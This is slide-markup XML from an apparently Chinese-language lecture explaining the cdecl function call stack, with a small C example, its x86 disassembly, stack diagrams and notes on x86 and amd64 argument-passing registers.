              <a:rPr lang="en" sz="1333" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>push   %ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>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13:   89 e5           mov    %esp,%ebp</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15:   83 ec 10        sub    $0x10,%esp</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18:   6a 03           push   $0x3</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1a:   6a 02           push   $0x2</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1c:   6a 01           push   $0x1</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1e:   e8 fc ff ff ff  call   1f &lt;caller+0xd&gt;</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23:   83 c4 0c        add    $0xc,%esp</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26:   89 45 fc        mov    %eax,-0x4(%ebp)</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29:   83 45 fc 04     addl   $0x4,-0x4(%ebp)</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2d:   8b 45 fc        mov    -0x4(%ebp),%eax</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30:   c9              leave</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>  31:   c3              ret</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="238" name="Shape 238"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="652144" y="1319939"/>
            <a:ext cx="4195600" cy="3377200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="121900" tIns="121900" rIns="121900" bIns="121900" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>int callee(int a, int b, int c) {</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>    return a + b + c;</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:endParaRPr sz="1600" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>int caller(void) {</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>    int ret;</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>    ret = callee(1, 2, 3);</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>    ret += 4;</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>    return ret;</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="239" name="Shape 239"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5078395" y="2882363"/>
            <a:ext cx="1082000" cy="508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 name="文本框 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E213CC25-F6BE-4F12-94DB-556019DA2B1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="261036" y="4584843"/>
            <a:ext cx="5521578" cy="2031325"/>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solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>x86</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1"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使用栈来传递参数</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使用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>eax</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存放返回值</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en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>amd64</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1"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前</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>个参数依次存放于 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>rdi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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rsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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rdx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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rcx</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r8</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r9 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>寄存器中</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第</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>个以后的参数存放于栈中</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{221FAE31-FEFE-4584-82AB-272242EC9B3F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="652144" y="761321"/>
            <a:ext cx="463941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函数调用栈的工作方式（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>cdecl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="矩形 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DB8EDCB-D9F1-49AD-849F-29198299935B}"/>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5" name="Shape 245"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068000" y="4437733"/>
            <a:ext cx="4712800" cy="225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00000000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0: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   8b 55 08    mov    0x8(%ebp),%edx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6:   8b 45 0c    mov    0xc(%ebp),%eax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9:   01 c2       add    %eax,%edx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b:   8b 45 10    mov    0x10(%ebp),%eax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e:   01 d0       add    %edx,%eax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10:   5d          pop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11:   c3          ret</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="246" name="Shape 246"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068000" y="1443533"/>
            <a:ext cx="4712800" cy="3121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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>00000012 &lt;caller&gt;:</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12:   55              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1333" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>push   %ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1333" b="1" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666"/>
              </a:highlight>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13:   89 e5           mov    %esp,%ebp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15:   83 ec 10        sub    $0x10,%esp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18:   6a 03           push   $0x3</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1a:   6a 02           push   $0x2</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1c:   6a 01           push   $0x1</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1e:   e8 fc ff ff ff  call   1f &lt;caller+0xd&gt;</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23:   83 c4 0c        add    $0xc,%esp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26:   89 45 fc        mov    %eax,-0x4(%ebp)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29:   83 45 fc 04     addl   $0x4,-0x4(%ebp)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2d:   8b 45 fc        mov    -0x4(%ebp),%eax</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30:   c9              leave</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31:   c3              ret</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="247" name="Shape 247"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="1980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%ebp in caller's caller</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="248" name="Shape 248"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6444800" y="2208367"/>
            <a:ext cx="1501600" cy="365600"/>
            <a:chOff x="3771275" y="1633500"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="249" name="Shape 249"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3771275" y="16335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b="1" kern="0">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:highlight>
                    <a:srgbClr val="666666"/>
                  </a:highlight>
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>%esp</a:t>
              </a:r>
              <a:endParaRPr sz="1333" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="250" name="Shape 250"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="4412675" y="17637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251" name="Shape 251"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8655400" y="1485751"/>
            <a:ext cx="1286800" cy="365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Stack</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="252" name="Shape 252"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-153529" y="1908581"/>
            <a:ext cx="1501600" cy="365600"/>
            <a:chOff x="3510225" y="1324000"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="253" name="Shape 253"/>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%eip</a:t>
              </a:r>
              <a:endParaRPr sz="1333" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="254" name="Shape 254"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="4151625" y="14542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14" name="文本框 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D839474-1063-4664-B889-74C8FE35E105}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068000" y="823118"/>
            <a:ext cx="463941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函数调用栈的工作方式（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>cdecl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="矩形 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29B207E3-6E01-4E5F-8503-132EBEBBEC1D}"/>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60" name="Shape 260"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068000" y="4437733"/>
            <a:ext cx="4712800" cy="225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00000000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0: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   8b 55 08    mov    0x8(%ebp),%edx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6:   8b 45 0c    mov    0xc(%ebp),%eax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9:   01 c2       add    %eax,%edx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b:   8b 45 10    mov    0x10(%ebp),%eax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e:   01 d0       add    %edx,%eax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10:   5d          pop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11:   c3          ret</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="261" name="Shape 261"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068000" y="1443533"/>
            <a:ext cx="4712800" cy="3121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00000012 &lt;caller&gt;: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12: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13:   89 e5           </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1333" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>mov    %esp,%ebp</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15:   83 ec 10        sub    $0x10,%esp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18:   6a 03           push   $0x3</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1a:   6a 02           push   $0x2</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1c:   6a 01           push   $0x1</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1e:   e8 fc ff ff ff  call   1f &lt;caller+0xd&gt;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23:   83 c4 0c        add    $0xc,%esp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26:   89 45 fc        mov    %eax,-0x4(%ebp)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29:   83 45 fc 04     addl   $0x4,-0x4(%ebp)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2d:   8b 45 fc        mov    -0x4(%ebp),%eax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30:   c9              leave</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31:   c3              ret</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="262" name="Shape 262"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="1980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%ebp in caller's caller</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="263" name="Shape 263"/>
          <p:cNvSpPr/>
          <p:nvPr/>
